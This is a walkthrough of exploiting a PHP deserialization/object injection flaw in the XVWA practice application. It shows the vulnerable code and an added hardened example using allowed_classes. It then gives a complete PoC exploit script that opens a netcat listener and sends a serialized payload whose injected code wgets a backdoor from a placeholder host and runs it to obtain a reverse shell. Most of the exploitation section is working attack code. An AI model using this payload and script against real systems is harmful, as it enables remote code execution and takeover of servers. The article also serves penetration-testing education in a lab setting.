PHP serialization/object Injection Vulnerability
This article is a short walkthrough of a PHP serialization/object injection vulnerability, from analysis to obtaining a remote shell on the host. If you want to test this vulnerability yourself, you can use XVWA or Kevgir. The first step of exploitation is to test whether PHP serialization is used by the target application. To assist with this test, we use the Burp Suite SuperSerial plug-in, which passively detects the use of PHP and Java serialization.
Analysis
We have detected that PHP serialization is used in the application, so we can start to check whether the application code contains a remote code execution vulnerability. Note that the serialized object is obtained from the parameter r:
$var1 = unserialize($_REQUEST['r']);
Deserialization then runs the class's __wakeup() method, which passes the inject property to eval:
eval($this->inject);
The application then echoes the result:
echo "".$var1[0]." - ".$var1[1];
So if we control the serialized object passed in parameter r, we have a code execution vulnerability!
<?php
class PHPObjectInjection{
    public $inject;
    function __construct(){
    }
    function __wakeup(){
        if(isset($this->inject)){
            eval($this->inject);
        }
    }
}

// ?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}

if(isset($_REQUEST['r'])){
    $var1=unserialize($_REQUEST['r']);
    if(is_array($var1)){
        echo "".$var1[0]." - ".$var1[1];
    }
}else{
    echo "parameter is missing";
}
?>
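As an added example, not code from the article or from XVWA, here is the vulnerable handler beside a hardened one that uses the allowed_classes option of unserialize() (PHP 7.0+; the example itself assumes PHP 7.4+). WakeupProbe, handleVulnerable and handleHardened are names chosen for this example.

```php
<?php
// Added example, not code from the article or from XVWA: the vulnerable
// unserialize() pattern beside a hardened version. Assumes PHP 7.4+
// (allowed_classes needs 7.0+, typed static properties need 7.4+).
declare(strict_types=1);

// Stand-in for any class whose magic method has side effects. __wakeup()
// only records that it ran, so the difference is observable without eval().
class WakeupProbe {
    public static bool $fired = false;
    public function __wakeup(): void { self::$fired = true; }
}

// Vulnerable: whatever class name the payload carries gets instantiated and
// its __wakeup() runs before is_array() is ever checked.
function handleVulnerable(string $r): string {
    $var1 = @unserialize($r);
    return is_array($var1) ? $var1[0] . ' - ' . $var1[1] : 'parameter is invalid';
}

// Hardened: allowed_classes => false maps every object in the payload to
// __PHP_Incomplete_Class, so no user-defined __wakeup()/__destruct() runs;
// the result is then validated as exactly two strings before use.
function handleHardened(string $r): string {
    $var1 = @unserialize($r, ['allowed_classes' => false]);
    if (!is_array($var1) || count($var1) !== 2
        || !is_string($var1[0] ?? null) || !is_string($var1[1] ?? null)) {
        return 'parameter is invalid';
    }
    return $var1[0] . ' - ' . $var1[1];
}

// Constructed inputs: the article's legitimate array payload and a serialized
// object, which is the structure any object-injection payload must have.
$legit  = 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}';
$object = serialize(new WakeupProbe());

WakeupProbe::$fired = false;
handleVulnerable($object);
echo 'vulnerable handler ran __wakeup(): ' . (WakeupProbe::$fired ? 'yes' : 'no') . "\n";

WakeupProbe::$fired = false;
echo handleHardened($legit) . "\n";
echo handleHardened($object) . "\n";
echo 'hardened handler ran __wakeup(): ' . (WakeupProbe::$fired ? 'yes' : 'no') . "\n";
```

When the input only ever needs to carry plain data, json_decode() is the safer choice; allowed_classes => false is the minimal fix when unserialize() must stay.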
Vulnerability Exploitation
To exploit this vulnerability, we wrote a simple PHP script that generates the serialized PHP payload and runs the command we want on the target host. For the command itself we use the general-purpose PHP reverse shell from pentestmonkey:
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: you need to upload this file to a web server you control, set the connect-back IP address and port in the reverse shell script, and adjust the URL and target in the following exploit script:
<?php
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP Object Injection flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
setup on a remote host with a connect back IP configured
*/
print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

class PHPObjectInjection{
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));

print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
?>
Demo
Now that the script is ready, we run it to obtain a reverse shell on the remote host and execute commands on it.